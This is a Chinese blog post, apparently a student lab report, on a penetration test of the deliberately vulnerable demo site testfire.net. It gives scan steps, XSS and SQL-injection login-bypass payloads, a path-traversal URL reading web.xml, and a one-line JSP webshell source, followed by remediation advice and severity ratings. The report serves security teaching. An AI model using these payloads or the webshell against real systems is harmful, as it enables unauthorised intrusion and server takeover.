渗透综合实验(www.testfire.net)

最新推荐文章于 2024-08-23 07:22:07 发布
最新推荐文章于 2024-08-23 07:22:07 发布
阅读量934 收藏 13
点赞数 8
文章标签: .net 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2303_79608809/article/details/140881062
版权

一、实验目的

(1)熟悉渗透测试的执行标准;

(2)掌握渗透测试的常用方法与技巧;

(3)掌握渗透测试报告的撰写步骤及关键要点。

二、实验任务

(1)对公开安全网站实施针对性的渗透测试,挖掘漏洞并获取信息;

(2)撰写渗透测试报告。

三、实验环境

攻击机IP:192.168.254.135

目标域名:www.testfire.net 

目标IP:65.61.137.117

四、实验步骤

使用nikto进行扫描

发现了Target IP:65.61.137.117

使用nmap进行端口扫描 65.61.137.117

通过扫描结果发现80网页端口进行开放,因此我们可以进行网页的渗透

使用 dirsearch 进行网站目录扫描

扫描出很多目录,由上图可知存在一个后台登陆路径 /admin,然后还可能存在一个目录穿越读取文件的漏洞 ,针对这个,我们还是先进入后台

1.后台管理员弱口令登入漏洞

我们进入后台发现存在弱口令admin/admin直接可以进入后台

登陆后功能主要包括可以管理用户(更改管理员密码、创建用户)、信息查询(可以尝试进行SQL注入)、转账功能(此处无二次验证功能,在实际网站中,敏感业务操作设计应引入二次鉴权机制)。

2.search框发现xss漏洞

在 search 框进行搜索的时候,发现存在 xss 漏洞

payload:<script>alert("2300550319wangshun")</script>

通过 XSS 漏洞,可以获取用户 Cookie 等信息,以实现进一步渗透。如果是存储型 XSS ,那么还可以通过设置钓鱼登录框,将用户填写的账号、密码表单信息发送到攻击者所指定的网络位置。

3.SQL注入

防止SQL注入,最有效的方法就是限制输入、参数化传递用户提交的数据,显然这里并没有进行有效防护,测试发现登录页面存在SQL注入漏洞

Payload: username:-1'  or 1=1--+    密码 随意

4.index.jsp 路径下存在 web.xml 配置文件泄露漏洞

我们访问看看这个页面然后进行下一步的测试:

payload:content=personal.htm

经过测试,我们发现读取 /etc/passwd 等重要文件不行,说明网站的防护还是可以的

但是发现它 是直接可以读取 web.xml 的网站配置信息:

Payload:http://65.61.137.117/index.jsp?content=../WEB-INF/web.xml

通过这个我们得知了配置信息后可以进行后续的准备更高级的攻击。

5、Feedback页面xxs漏洞

Feedback这里,在用户名输入框输入<script>alert("2300550319wangshun")</script>,xss攻击成功。

6.Feedbackback页面存在任意文件上传漏洞

我们尝试修改文件内容为一句话 JSP webshell, 

木马内容为:

<%

    String cls = request.getParameter("passwd");

    if (cls != null) {

        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);

    }

%>

然后上传wenda.jsp

结果显示的邮箱地址被bp抓包从123修改为了123qq.com

发现能够上传 却找不到文件上传的路径,由于是测试网站,甚至怀疑这里并没有做实际的保存工作,而只是返回了结果信息。

五、实验总结

漏洞修复建议:

1. 防止 SQL 注入,最有效的方法就是限制输入、参数化传递用户提交的数据,显然这里并没有进行有效防护,测试发现登录页面存在 SQL 注入漏洞

2. 后台弱口令应该设置验证码或者强口令登入

3. 防止文件路径遍历漏洞的最有效方法是避免将用户提供的输入完全传递给文件系统 API 。

4. 修复对 web.xml 访问权限可直接删除 docs 目录和 examples 目录

5.XSS 漏洞修复课采取对输入的数据进行 HTML 转义,使其不会识别为可执行脚本,和白名单过滤等方法。

漏洞评级

1.后台弱口令登入管理员漏洞:中危

管理员用户功能不是很多,主要包括可以管理用户(更改管理员密码、创建用户)、信息查询(可以尝试进行SQL注入)、转账功能(此处无二次验证功能,在实际网站中,敏感业务操作设计应引入二次鉴权机制)

2.index.jsp路径下存在 web.xml配置文件泄露漏洞 :中危

如果文件目录下有更多的敏感信息,那么危害会更大,攻击者根据配置信息,可采用远程攻击网站造成网站的破坏

3.search框存在xss漏洞:  低危

通过XSS漏洞,可以获取用户 Cookie 等信息,以实现进一步渗透。

如果是存储型XSS,那么还可以通过设置钓鱼登录框,将用户填写的账号、密码表单信息发送到攻击者所指定的网络位置。

4.反馈页面存在任意文件上传漏洞 : 低危

因为可能是个测试网站,没有文件路径,所以但是还是能上传一句话木马,攻击者可通过一些攻击工具像weblogic实现不需要路径的getshell,来进行提权

5.登入存在sql注入:高危

用户通过发现注入后可采取sqlmap进行网站的数据库爬取,造成数据的流失

厨师沙拉572
关注
  • 8
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络安全——渗透综合实验
HizT_1999的博客
06-24 2303
综合实验: 任务一: 1.使用wireshark分析数据包 通过对test1.cap的分析,可以看出192.168.1.3与192.168.1.4之间存在ftp服务。 2.使用ettercap进行嗅探,获取ftp登录信息 得到ftp服务登录账号:simple 密码:simple123 登录ftp服务器获取key.txt内容。同时还发现192.168.1.4存在WebLogic漏洞,使用 工具进行攻击。 3.weblogic攻击 查看key1.txt内容,提交答案如下: 任务二: 1.分析test
内网渗透综合实验.docx
08-29
内网渗透综合实验 本文档主要讲解了内网渗透综合实验的相关知识点,包括内网通信、隧道通信、Powercat 和 nc 反弹 shell、DNS 隧道、ssh 隧道等。 一、内网通信 内网通信是指在局域网内部的计算机之间进行数据...
期中考Web复现
m0_75178803的博客
10-16 313
第一题 1z_php第二题 签到O.o?打开题目,发现是关于Apache Tomcat/8.0.43的漏洞随意的输入账号和密码点击登录,然后bp抓数据包如果bp抓不到登录数据包,我们可以在代理中的HTTP历史记录中选中要抓取的tomcat登录地址,右键选择添加到范围在目标范围中便选中了我们要抓取的目标地址,这个时候便能重新登录抓取发现是账号和密码base64加密解码后发现账号和密码是以冒号连接,格式为 账号:密码然后我们选择用爆破,将账号和密码爆破出来我们选择singer模式。
tomcat7.x远程命令执行(CVE-2017-12615)漏洞利用复现
m0_58606546的博客
01-11 4115
一、漏洞前言 2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞漏洞CVE编号:CVE-2017-12615和CVE-2017-12616,该漏洞受影响版本为7.0-7.80之间,在一定条件下,攻击者可以利用这两个漏洞,获取用户服务器上 JSP 文件的源代码,或是通过精心构造的攻击请求,向用户服务器上传恶意JSP文件,通过上传的 JSP 文件 ,可在用户服务器上执行任意代码,从而导致数据泄露或获取服务器权限,存在高安全风险 二、漏洞名称 CVE-2017-12615-远程代
[RoarCTF 2019]Easy Java(web.xml)
weixin_45577185的博客
07-30 230
wp链接 WEB-INF主要包含一下文件或目录: /WEB-INF/web.xml:Web应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则。 /WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在 .jar文件中 /WEB-INF/lib/:存放web应用需要的各种JAR文件,放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件 /WEB-INF/src/:源码目录,按照包名结
weblogic CVE 2017-10271
ChenD的学习笔记
05-22 1911
将输出重定向到当前循环的Branding_Login_WeblogicConsole.gif文件的同级目录下的pwd.txt文件,因为可以访问到该图片,所以能访问到创建的文件。这里随便找一个可访问的文件,访问192.168.27.128:7001/console,进入到登陆页面,右键查看源代码,随便找一个图片或文件的链接,这就搞到了可访问的文件名。这条命令的意思是,找到所有叫Branding_Login_WeblogicConsole.gif的文件,循环读取,每次循环 执行 id;ifconfig命令,
web中间件安全
qq_43590351的博客
04-12 4643
中间件漏洞
网络渗透实验一.docx
12-13
【网络渗透实验】是网络安全领域的一个重要实践环节,主要目的是理解和掌握网络侦察、扫描等基本技术,以及如何利用这些技术进行安全评估。本实验通过实际操作,帮助学习者熟悉常用的渗透测试工具,如搜索引擎、NMAP...
信安网络渗透测试实验一.docx
12-15
网络渗透测试实验报告 本实验报告的目的是理解网络扫描和网络侦察的作用,通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎、扫描工具的应用,并通过信息收集为下一步渗透工作打下基础。本实验使用 Kali Linux 和...
Metasploit渗透测试实验报告.docx
05-17
### Metasploit渗透测试实验报告知识点汇总 #### 实验目的 1. **了解Metasploit框架**:熟悉Metasploit框架的基本概念与组成部分,能够掌握并应用该框架进行已知漏洞渗透攻击。 2. **渗透测试流程**:通过实践...
EmguCV学习笔记 VB.Net 5.1 基本变换
UruseiBest 的技术专栏
08-20 909
版权声明:本文为博主原创文章,转载请在显著位置标明本文出处以及作者网名,未经作者允许不得用于商业目的。EmguCV是一个基于OpenCV的开源免费的跨平台计算机视觉库,它向C#和VB.NET开发者提供了OpenCV库的大部分功能。教程配套文件及相关说明获得pdf教程和代码学习VB.Net知识学习C#知识,
EmguCV学习笔记 VB.Net 5.3 透视变换
UruseiBest 的技术专栏
08-21 758
EmguCV是一个基于OpenCV的开源免费的跨平台计算机视觉库,它向C#和VB.NET开发者提供了OpenCV库的大部分功能。教程配套文件及相关说明获得pdf教程和代码。
EmguCV学习笔记 VB.Net 6.2 轮廓处理
最新发布
UruseiBest 的技术专栏
08-23 816
EmguCV是一个基于OpenCV的开源免费的跨平台计算机视觉库,它向C#和VB.NET开发者提供了OpenCV库的大部分功能。教程配套文件及相关说明获得pdf教程和代码。
netty4报错:io.netty.util.IllegalReferenceCountException: refCnt: 0, decrement: 1
qq_45225798的博客
08-19 410
背景:netty执行链中有一串自定义的handler,目前我想要在中间再加上一个pingPonghandler来进行控制帧的处理,从而避免ng的读写超时(客户要求,与他们建立的通道一直连接,不进行断连,从而需要考虑ng的问题);当我添加如下代码后报错:io.netty.util.IllegalReferenceCountException: refCnt: 0, decrement: 1,ByteBuf的引用计数refCnt为0;获取引用计数。
EmguCV学习笔记 VB.Net 第6章 形状操作
UruseiBest 的技术专栏
08-22 543
EmguCV是一个基于OpenCV的开源免费的跨平台计算机视觉库,它向C#和VB.NET开发者提供了OpenCV库的大部分功能。6.3.1 最大外接矩形BoundingRectangle。6.3.5 最小外接三角形MinEnclosingTriangle。6.3.2 最小外接矩形minAreaRect。6.3.3 多边形逼近ApproxPolyDP。6.3.8 最短距离pointPolygonTest。6.5.2 凸缺陷 ConvexityDefects。教程配套文件及相关说明。6.3 轮廓外接多边形。
EmguCV学习笔记 VB.Net 5.2 仿射变换
UruseiBest 的技术专栏
08-20 1161
EmguCV是一个基于OpenCV的开源免费的跨平台计算机视觉库,它向C#和VB.NET开发者提供了OpenCV库的大部分功能。教程配套文件及相关说明获得pdf教程和代码学习VB.Net知识,学习C#知识,
如何在 FastReport .NET 中构建和安装 Postgres 插件
励志做最业余的专业博主,控件产品可以私我~
08-20 1261
今天我们将介绍如何使用报表设计器的 FastReport 插件连接数据库,欢迎查阅~
EmguCV学习笔记 VB.Net 第5章 图像变换
UruseiBest 的技术专栏
08-20 729
版权声明:本文为博主原创文章,转载请在显著位置标明本文出处以及作者网名,未经作者允许不得用于商业目的。5.1.4 翻转Flip。5.1.2 Rotate旋转。教程配套文件及相关说明。获得pdf教程和代码。
渗透测试www.testfire.net情报搜集与DNS分析
渗透测试情报搜集是网络安全评估的重要环节,尤其是在针对www.testfire.net这样的模拟银行网站时,该站点由IBM设立,主要用于展示AppScan漏洞扫描器的能力,因此包含大量Web安全漏洞。在这个过程中,情报搜集涉及到...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值